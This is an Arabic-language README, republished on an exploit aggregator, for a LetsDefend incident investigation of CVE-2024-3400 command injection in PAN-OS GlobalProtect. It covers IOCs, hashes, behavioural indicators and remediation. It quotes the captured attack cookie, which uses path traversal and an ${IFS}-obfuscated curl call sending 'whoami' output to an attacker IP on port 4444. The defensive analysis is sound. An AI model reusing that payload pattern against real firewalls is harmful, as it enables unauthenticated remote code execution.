Sploitus

Exploit for letsdefend-cve2024-3400-case-study

kitploit · 2026-09-06

Exploit Code

MARKDOWN183 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-CYPRIANATSYOR-LETSDEFEND-CVE2024-3400-CASE-STUDY
# letsdefend-cve2024-3400-case-study

استراتيجيات الكشف والتحليل والاستجابة لمحاولات استغلال CVE-2024-3400 التي تستهدف بوابات GlobalProtect في Palo Alto PAN-OS. يتضمن مؤشرات الاختراق (IOCs) وأنماط الاستغلال وإرشادات التخفيف.

# التحقيق في حادثة CVE-2024-3400

# 🔍 نظرة عامة

يحتوي هذا المستودع على تحقيق مفصل وتحليل تهديدات لـ **CVE-2024-3400** ، وهي ثغرة حرجة في حقن الأوامر بدون مصادقة تؤثر على برنامج **Palo Alto Networks PAN-OS** ، وتستهدف تحديدًا بوابة GlobalProtect.

في 18 أبريل 2024، تم اكتشاف نشاط استغلال ضد جدار حماية PAN-OS داخلي عبر نقطة النهاية الضعيفة `/global-protect/login.esp`. استخدم المهاجم ملف تعريف ارتباط `SESSID` معدًا يحتوي على أمر `curl` يتم تنفيذه عبر علامة backtick للوصول إلى خادم C2 بعيد مستضاف على `144.172.79.92` (ميامي، فلوريدا). استغلت الحمولة الضارة `${IFS}` لتجاوز عوامل التصفية البسيطة واستخدمت دليل القياس عن بُعد (telemetry) في PAN-OS لترتيب النشاط الضار. استجاب جدار الحماية برمز `200 OK`، مما يشير إلى أن الحمولة نُفذت بنجاح على الأرجح.

![نظرة عامة على الحادثة](https://assets.kitploit.com/production/public/readmes/35428/00131109d47bd88ecef422299b17e908eb809df89ff75807b4c44aa2f83478da.png)

## 📄 ملخص الحادثة

  * **معرّف الحدث** : 249

  * **قاعدة الكشف** : SOC274 – استغلال حقن الأوامر في PAN-OS

  * **وقت الحدث** : 18 أبريل 2024، الساعة 03:09 صباحًا بالتوقيت العالمي المنسق (UTC)

  * **اسم المضيف** : `PA-Firewall-01`

  * **عنوان IP الوجهة** : `172.16.17.139`

  * **عنوان IP المصدر** : `144.172.79.92`

  * **طريقة الطلب** : `POST`

  * **نقطة النهاية** : `/global-protect/login.esp`

  * **حمولة ملف تعريف الارتباط** : `SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaacurl${IFS}144.172.79.92:4444?user=$(whoami)`

  * **التجزئات الضارة** :

  * **SHA256** : `3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac`

  * **MD5** : `0c1554888ce9ed0da1583dbdf7b31651`

  * :  (تم تنفيذه باستخدام )




## 🧠 استخبارات التهديدات

![استخبارات التهديدات](https://assets.kitploit.com/production/public/readmes/35428/01dc0b66adce90cae20c1a2a2dcd34759a7b203008d97876bfb3f590102614da.png)

### الخطوة 1: الكشف الأولي عن الاستغلال بالبحث في Malpedia

![الخطوة 1 من التحقيق](https://assets.kitploit.com/production/public/readmes/35428/56980a8d8632104eee7df8f2441a184b57faa1ae40dbb923b44fb40aa4e511cc.png)

### الخطوة 2: تحليل التجزئة والتحقيق فيها

![الخطوة 2 من التحقيق](https://assets.kitploit.com/production/public/readmes/35428/e86f303ff3639daa43997ac5d9d59a65ec3689439f29ccab509e47f8076150e1.png)

### الخطوة 3: تحقيق إضافي

![الخطوة 3 من التحقيق](https://assets.kitploit.com/production/public/readmes/35428/c07604e9d99251e54bd39a863f8c72bc8cbd2070e0dabdf9323a0a204af07f3c.png)

### الخطوة 4: التحقيق في عنوان IP

![الخطوة 4 من التحقيق](https://assets.kitploit.com/production/public/readmes/35428/089612f7ffe8a67a014f8424847e39aa23a9495038db6320d3b6027f1a6a717c.png)

## 🧠 المؤشرات السلوكية

  * إساءة استخدام `SESSID` لحقن الأوامر
  * استخدام `${IFS}` للمراوغة
  * ترتيب الحمولة في `/opt/panlogs/tmp/device_telemetry`
  * تورط عملية `dt_send` بعد الاستغلال
  * استدعاء شبكة عكسي إلى عنوان IP الخاص بالمهاجم على المنفذ `4444`



* * *

## 📄 أدلة السجلات

![نموذج من السجلات](https://assets.kitploit.com/production/public/readmes/35428/66a7935f7d9f51778a09645baadc98ea9e5f92aef57d88dc79d319207a9477f7.png)

* * *

## 🧩 ارتباط التجزئات

![تطابق التجزئة](https://assets.kitploit.com/production/public/readmes/35428/92b066bce08c16ee90aefcdadb51ff17bcd603dd1c6b464f88bcf26482160ec3.png)

* * *

## ✅ النقاط المكتسبة في LetsDefend

![النقاط الرئيسية](https://assets.kitploit.com/production/public/readmes/35428/acd9bc09463c5652bcf5985bd4abf5b8ea074317b2c4ca2bebfabc720b5bf5a8.png)

## 🚨 التأثير

  * تنفيذ أوامر عن بُعد بدون مصادقة على جهاز أمني أساسي
  * احتمال تنزيل وتنفيذ حمولة Python يتحكم بها المهاجم
  * إساءة استخدام آليات القياس عن بُعد الداخلية في PAN-OS للترتيب أو استخراج البيانات
  * السماح بحركة مرور من عنوان IP ضار معروف



## ✅ إجراءات الاستجابة الموصى بها

  1. **تحديث PAN-OS** إلى الإصدارات: `10.2.9-h1` أو `11.0.4-h1` أو `11.1.2-h3`
  2. **حظر عنوان IP الضار** : `144.172.79.92`
  3. **البحث عن مؤشرات الاختراق (IOCs)** في السجلات وأنظمة الملفات
  4. **فحص أدلة القياس عن بُعد** بحثًا عن ملفات مشبوهة أو سلوك تنفيذ
  5. **عزل الأنظمة المتأثرة** وإجراء تحليل جنائي كامل



## 📁 المحتويات

  * `logs/`: سجلات الكشف الأولية والمحللة
  * `ioc/`: تجزئات الملفات وعناوين IP المرتبطة بالهجوم
  * `analysis/`: تعمق في سلوك الاستغلال وتتبع العمليات
  * `report/`: ملخص وصور للسجلات والأكواد من تحقيقاتي



* * *

## ما هو CVE-2024-3400

يشير CVE-2024-3400 إلى ثغرة حرجة في Palo Alto Networks PAN-OS، وتؤثر تحديدًا على بوابات GlobalProtect. إليك تفصيل لما هو معروف علنًا عنها:

## 🔥 CVE-2024-3400 – ثغرة حقن الأوامر في Palo Alto PAN-OS

درجة CVSS: 10.0 (حرجة)

تاريخ النشر: أبريل 2024

المنتجات المتأثرة: PAN-OS 10.2 و11.0 و11.1 عند تفعيل GlobalProtect.

الاستغلال: مؤكد في البرية (يوم صفري)

نوع الثغرة: حقن أوامر بدون مصادقة

## 🧠 ما هو الخطر؟

تسمح CVE-2024-3400 للمهاجمين غير المصادقين بتنفيذ أوامر عشوائية على نظام تشغيل جدار الحماية. وهذا يمنحهم فعليًا سيطرة كاملة على الأجهزة المتأثرة دون الحاجة إلى بيانات اعتماد — وهي نقطة اختراق خطيرة لأي مؤسسة تعتمد على جدران حماية Palo Alto.

## ⚠️ الشروط المطلوبة للاستغلال:

يجب تفعيل بوابة GlobalProtect.

إصدارات محددة من PAN-OS (10.2.x، 11.0.x، 11.1.x).

قابلة للاستغلال عبر الإنترنت إذا لم تكن خلف طبقات حماية إضافية.

## 🔎 ما يفعله المهاجمون:

إرسال طلبات مصممة لاستغلال ثغرة الحقن.

نشر قذائف بعيدة أو تنزيل حمولات من المرحلة الثانية.

السلوك المرصود يشمل:

تنفيذ أوامر عبر عناوين URL مصممة

آليات استمرارية

تنقل جانبي داخل الشبكات

## 🛡️ التخفيف والتوصيات:

التحديث فورًا: أصدرت Palo Alto إصلاحات؛ قم بالترقية إلى الإصدارات غير المتأثرة (مثل 10.2.9-h1 أو 11.0.4-h1 أو 11.1.2-h3 أو أحدث).

التحقق من مؤشرات الاختراق (IOCs) مثل العمليات المشبوهة أو الاتصالات الصادرة أو سجل أوامر CLI غير المعتاد.

استخدام أدوات مثل Shodan أو جرد الأصول للعثور على الأجهزة المعرضة للخطر.

## 🛠️ كيفية التحقيق (مثل عبر LetsDefend أو SIEM):

البحث عن عناوين IP خارجية تصل إلى GlobalProtect دون مصادقة صالحة.

التحقق من تنفيذ أوامر مشبوهة في السجلات (show system processes، cat /etc/passwd، وغيرها).

مراقبة سلوك جدار الحماية والتنبيه على الاتصالات الصادرة الشاذة.

> يعمل هذا المستودع كتقرير تحقيق داخلي وكمورد تعليمي للمدافعين الراغبين في فهم الاستغلال الواقعي لثغرات PAN-OS. المساهمات والملاحظات الإضافية مرحب بها.